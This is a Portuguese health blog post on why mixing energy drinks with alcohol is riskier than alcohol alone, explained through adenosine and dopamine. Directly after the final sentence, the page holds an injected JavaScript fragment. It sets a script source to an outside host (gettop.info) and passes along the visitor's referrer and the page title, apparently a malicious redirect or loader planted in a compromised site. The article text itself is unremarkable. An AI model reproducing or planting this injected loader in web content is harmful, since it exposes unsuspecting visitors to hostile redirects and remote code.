FitEscola | Bebidas energéticas e álcool: Riscos resultantes da sua combinação
18251
single,single-post,postid-18251,single-format-standard,ajax_fade,page_not_loaded,,qode-child-theme-ver-1.0.0,qode-theme-ver-6.1,wpb-js-composer js-comp-ver-4.3.5,vc_responsive
Einen dicken Kopf haben

11 Mai Bebidas energéticas e álcool: Riscos resultantes da sua combinação

O consumo de bebidas energéticas, combinadas com álcool, apresenta mais riscos do que o consumo isolado de bebidas alcoólicas, ainda que os mecanismos não estejam bem estabelecidos. [ler mais]

As bebidas energéticas ou estimulantes são conhecidas por diminuírem a letargia e aumentarem os níveis de energia. São produtos bastante apelativos, na medida em que são normalmente adocicados, carbonatados e com elevados níveis de cafeína. Podem conter outros ingredientes como taurina, guaraná, ginseng e vitaminas do complexo B.

São vários os casos de jovens admitidos na urgência dos hospitais, com níveis elevados de intoxicação, após o consumo destes produtos, levando a que se questione sobre a segurança destas bebidas.

Possíveis mecanismos que explicam os efeitos prejudiciais no cérebro resultantes da combinação de cafeína e álcool:

1- Atuação sobre a adenosina (neurotransmissor envolvido na sensação de sedação, sono)
– O álcool bloqueia a recaptação de adenosina, elevando a sua atividade, o que resulta no aumento da sensação de sono;
– A cafeína é antagonista da adenosina: bloqueia os recetores de adenosina, impedindo a sua ação. Resulta na diminuição da sedação e melhoria do estado de alerta;
– Quanto maior a atividade da adenosina, ou seja, quando mais evidente for o estado de sedação do organismo, mais eficaz é a atuação da cafeína;

2- Atuação sobre a dopamina (neurotransmissor envolvido na sensação de prazer)
– Ativação dos recetores de adenosina inibe a libertação de dopamina;
– Presença de cafeína induz inativação de recetores de adenosina, resultando na maior libertação de dopamina e, consequentemente, numa maior sensação de prazer e bem-estar.

Estes mecanismos estão envolvidos no aumento do desejo/vontade de ingerir bebidas alcoólicas (a longo prazo resulta na dependência do álcool), levam ao comprometimento da condução e a comportamentos sexuais de elevado risco.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;